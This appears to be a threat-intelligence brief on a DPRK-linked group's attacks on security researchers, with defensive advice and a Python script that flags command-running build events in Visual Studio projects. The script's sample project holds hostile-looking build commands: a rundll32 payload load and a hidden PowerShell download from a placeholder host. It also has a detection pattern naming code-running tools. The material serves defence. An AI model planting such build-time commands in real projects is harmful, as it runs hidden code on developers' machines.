
Security Researchers Likely Targeted With Multiple Attack Methods

In a new report, Microsoft disclosed that it has been tracking multiple tactics used by the DPRK-linked group it calls ZINC to target offensive security professionals. When the campaign was first publicly reported earlier this week, the only known attack vector was a Visual Studio C# project containing a malicious pre-build event: a build step that runs an attacker-supplied command as soon as the victim compiles the project, without any of the project's visible source code ever executing. Microsoft's report adds detail on the other methods the attackers used to gain access to researchers' systems.

One such vector was a malicious MHTML file (an Internet Explorer web archive) that, when opened, executed embedded JavaScript locally on the device through Internet Explorer and called out to attacker-controlled infrastructure. Another was loading a vulnerable driver (the Vir.IT eXplorer antivirus driver) in order to exploit CVE-2017-16238 for code execution; because the attackers mishandled the exploit, the attempt crashed the victim's machine instead of running their payload.

Analyst Notes

With the DPRK targeting offensive security researchers, taking personal measures to protect oneself is more important than ever, especially for people who are publicly active in research on either the offensive or the defensive side of the industry. Treat unsolicited messages from strangers offering exploits or tools that have not been publicly disclosed with caution, and do not open or build files they send on a machine used for real work. If third-party tools such as scripts or project files are brought into an organization, read the source before running them, and include the build configuration in that review, since a project can execute commands at compile time that never appear in its source files. Take the time to investigate and understand what the code does, and discuss the security implications with coworkers and trusted individuals.
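As an added example of the build-configuration review recommended above (this is not code from the original flash, from Microsoft, or from the campaign itself), the script below parses a Visual Studio project file and reports every place MSBuild will run a command at build time: PreBuildEvent, PostBuildEvent and PreLinkEvent elements and Exec tasks inside custom targets. It flags commands that invoke common living-off-the-land binaries, reference loose DLL or .db files, or contain URLs. The sample project, the indicator list and the file name helper.db are all constructed for illustration and do not reproduce the real malicious project.

```python
"""Triage helper: list and flag command-executing build events in a .csproj/.vcxproj.

Added example, not the flash's own tooling. The sample project and the
indicator list below are constructed for illustration.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample project (assumption: illustrative only, not the real one).
# It mixes one benign post-build copy with two build-time command executions
# that a reviewer should want to see before pressing Build.
SAMPLE_CSPROJ = r"""<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net5.0</TargetFramework>
    <PreBuildEvent>rundll32.exe "$(ProjectDir)build\helper.db",Run</PreBuildEvent>
    <PostBuildEvent>copy "$(TargetPath)" "$(SolutionDir)dist\"</PostBuildEvent>
  </PropertyGroup>
  <Target Name="Fetch" BeforeTargets="Build">
    <Exec Command="powershell -nop -w hidden -c &quot;iwr https://example.invalid/s&quot;" />
  </Target>
</Project>
"""

# Heuristic indicators (assumption: a short illustrative list, not exhaustive):
# LOLBins that load or run arbitrary code, loose DLL/.db payload files, and URLs.
SUSPICIOUS = re.compile(
    r"\b(rundll32|regsvr32|mshta|powershell|pwsh|certutil|bitsadmin|wscript|cscript)\b"
    r"|\.dll\b|\.db\b|https?://",
    re.IGNORECASE,
)

# MSBuild elements whose contents are executed as shell commands during a build.
EVENT_TAGS = {"PreBuildEvent", "PostBuildEvent", "PreLinkEvent"}


def _local(tag):
    """Strip the MSBuild XML namespace (old-style projects declare one) from a tag."""
    return tag.rsplit("}", 1)[-1]


def find_build_commands(project_xml):
    """Return (kind, command, suspicious) for every build-time command in the project.

    Handles both .csproj (command is the element text) and .vcxproj
    (command is nested in a <Command> child), plus <Exec Command="..."/> tasks.
    """
    root = ET.fromstring(project_xml)
    found = []
    for el in root.iter():
        name = _local(el.tag)
        if name in EVENT_TAGS:
            cmd_el = next((c for c in el if _local(c.tag) == "Command"), el)
            cmd = (cmd_el.text or "").strip()
        elif name == "Exec":
            cmd = (el.get("Command") or "").strip()
        else:
            continue
        if cmd:
            found.append((name, cmd, bool(SUSPICIOUS.search(cmd))))
    return found


def flagged_commands(project_xml):
    """Only the build-time commands that matched an indicator."""
    return [(kind, cmd) for kind, cmd, bad in find_build_commands(project_xml) if bad]


if __name__ == "__main__":
    for kind, cmd, bad in find_build_commands(SAMPLE_CSPROJ):
        print(f"[{'FLAG' if bad else ' ok '}] {kind}: {cmd}")
```

Run it against every .csproj, .vcxproj and .targets file in a project received from an untrusted party before opening the solution in Visual Studio; a match is a reason to inspect the referenced files and not to build on a workstation. The indicator list is deliberately simple and is a starting point for review, not a substitute for reading the commands themselves.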

References:
https://www.bleepingcomputer.com/news/security/microsoft-dprk-hackers-likely-hit-researchers-with-chrome-exploit/
https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/